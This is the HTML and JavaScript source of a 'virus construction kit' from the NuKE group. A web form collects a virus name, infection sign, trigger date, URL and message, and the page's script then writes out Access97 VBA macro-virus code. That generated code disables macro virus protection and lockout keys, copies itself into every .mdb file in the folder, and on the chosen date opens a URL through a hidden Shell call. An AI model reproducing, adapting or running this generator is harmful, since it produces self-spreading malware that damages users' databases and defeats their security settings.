<html>
<head>
<title>The Macro Access Kit 1.0</title>
<script>
//<plaintext>
//
//The Macro Access Kit 1.0
//By AngelsKitten / [NuKE]
// 
//Greetings to: Knowdeth, Evul, RoadKil, BSl4, RAiD, 
//Foxz, Deloss, Raven, Masey, LysKovick, Jackie twoflower, 
//Reptile, Duke, FlyShadow, ULTRAS & Nala
//Groups: NuKE, 29A, MVT, NVT, Matrix, SMF & SLAM 
//  
//For Netscape 3.0 and Higer
//
//Define the variables

var vname="";
var aname="";
var infsign="";
var pdate="";
var url="";
var bmsg="";

//The Default variables

function Reset(vars) {
  codewindow=true;
  with (document) {
  vars.Vname.value = "MyHappyMacro 1.0";
  vars.Aname.value = "AngelsKitten / [NuKE]";
  vars.Infsign.value = "MyMacro";
  vars.Pdate.value = "10";
  vars.Url.value = "http://www.coderz.net";
  vars.Bmsg.value = "Hi There :)";
 }
}
function WinOpen(something) {
 msg=open(something,"DisplayWindow",
  "toolbar=no,directories=no,menubar=yes,scrollbars=yes,resizable=yes");
 codewindow=true;
 return msg;
}
function write(stuff) {
 if (codewindow) msg.document.writeln(stuff);
  else document.writeln(stuff);
}
function wr(stuff) {
 if (codewindow) msg.document.write(stuff);
  else document.write(stuff);
}

function MakeVba(vars) {
  vname=vars.Vname.value;
  aname=vars.Aname.value;
  infsign=vars.Infsign.value;
  pdate=vars.Pdate.value;
  url=vars.Url.value;
  bmsg=vars.Bmsg.value;
  if (codewindow) var msg=WinOpen("");
  wr("<pre><hr>");
  GenerateCode();
  wr("<pre><hr>");
 if (codewindow) {
 }
}
function GenerateCode() {
 write("Attribute VB_Name = &quot;"+infsign+"&quot;");
 write("'A97M "+vname);
 write("'"+aname);
 write("'*************************************");
 write("'  Made With The Macro Access Kit 1.0");
 write("'  By AngelsKitten / [NuKE]");
 write("'*************************************");
 write("");
 write("Option Compare Database");
 write("Option Explicit");
 write("");
 write("Function tma()");
 write("On Error Resume Next");
 write("Application.DisplayAlerts = False");
 write("Application.MacrovirusProtection = False");
 write("Application.SetOption &quot;Show Hidden Objects&quot; = False");
 write("CommandBars(&quot;Tools&quot;).Controls(16).Delete");
 write("CurrentDb.Properties(&quot;AllowBypassKey&quot;) = False");
 write("CurrentDb.Properties(&quot;AllowSpecialKeys&quot;) = False");
 write("CurrentDb.Properties(&quot;AllowBreakIntoCode&quot;) = False");
 write("Dim ftg, fti, mb As String");
 write("fti = False");
 write("ftg = Dir(&quot;*.mdb&quot;, vbNormal)");
 write("If ftg <> &quot;&quot; Then");
 write("mb = CurrentDb.Name");
 write("If mb = ftg Then fti = True");
 write("If fti = False Then Application.DoCmd.TransferDatabase acExport, &quot;Microsoft Access&quot;, ftg, acMacro, &quot;Autoexec&quot;, &quot;Autoexec&quot;");
 write("If fti = False Then Application.DoCmd.TransferDatabase acExport, &quot;Microsoft Access&quot;, ftg, acModule, &quot;"+infsign+"&quot;,&nbsp;&quot;"+infsign+"&quot;");
 write("While ftg <> &quot;");
 write("ftg = Dir");
 write("If mb = ftg Then fti = True");
 write("If fti = False Then Application.DoCmd.TransferDatabase acExport, &quot;Microsoft Access&quot;, ftg, acMacro, &quot;Autoexec&quot;, &quot;Autoexec&quot;");
 write("If fti = False Then Application.DoCmd.TransferDatabase acExport, &quot;Microsoft Access&quot;, ftg, acModule, &quot;"+infsign+"&quot;,&nbsp;&quot;"+infsign+"&quot;");
 write("Wend");
 write("If Day(Now()) = "+pdate+ " Then");
 write("  MsgBox &quot;"+bmsg+"&quot;");
 write("  Shell &quot;start "+url+"&quot;, vbHide");
 write("End If");
 write("End If");
 write("End Function");
 write("")
 write("Sub SetStartupProperties()");
 write("  ChangeProperty &quot;AllowSpecialKeys&quot;, dbBoolean, False");
 write("  ChangeProperty &quot;AllowBreakIntoCode&quot;, dbBoolean, False");
 write("  ChangeProperty &quot;AllowBypassKey&quot;, dbBoolean, False");
 write("  call tma");
 write("End Sub");
}


function Info() {
 WinOpen("");
 wr("<body BACKGROUND=pretty.gif>")
 wr("<center>")
 wr("<h1>The Macro Access Kit 1.0</h1>");
 wr("<b>By AngelsKitten / [NuKE]</B><br><br>");
 wr("<img src=kitten.jpg><br>"); 
 wr("Makes Access97 VBA Virus Like Code, That can be copy and pasted to Access97.<br>");
 wr("I hope you enjoy this kit as much as I enjoyed makeing it for you.<br>");
 wr("This is my first VCK so if you have any suggestions let me know :)<br>");
 wr("Coded 6-15-2000<br><br>");
 wr("<b>Greetings to:</b> Knowdeth, Evul, RoadKil, BSL4, RAiD, Foxz, Deloss, Raven,<br>");
 wr("Masey, LysKovick, Jackie twoflower, Reptile, Duke, FlyShadow, ULTRAS & Nala<br>"); 
 wr("<b>Groups:</b> NuKE, 29A, MVT, NVT, Matrix, SMF & SLAM<br>");
 wr("</center>")
}

</script>
</head>

<body BACKGROUND="pretty.gif" onload="Reset()">
<center><font size="5"><b>The Macro Access Kit 1.0</b></font>
<br><br>
<img src="ak.jpg">
<form name="vars">
Virus Name: &nbsp;&nbsp;&nbsp;<input type="text" name="Vname" size=30 maxlength=30><br>
Author Name: <input type="text" name="Aname" maxlength=30 size=30><br>
Infection Sign: <input type="text" name="Infsign" size=30 maxlength=30><br>
<b>Payload:</b><br>
Date: <input type="text" name="Pdate" size=3 maxlength=2>&nbsp;
URL: <input type="text" name="Url" size=27><br>
MsgBox: <input type="text" name="Bmsg" size=34><br>
<br>
<input type="button" value="Make Access Source" onclick="MakeVba(this.form)">
<input type="button" value="About" onclick="Info()">
</form></center>
</body>
</html>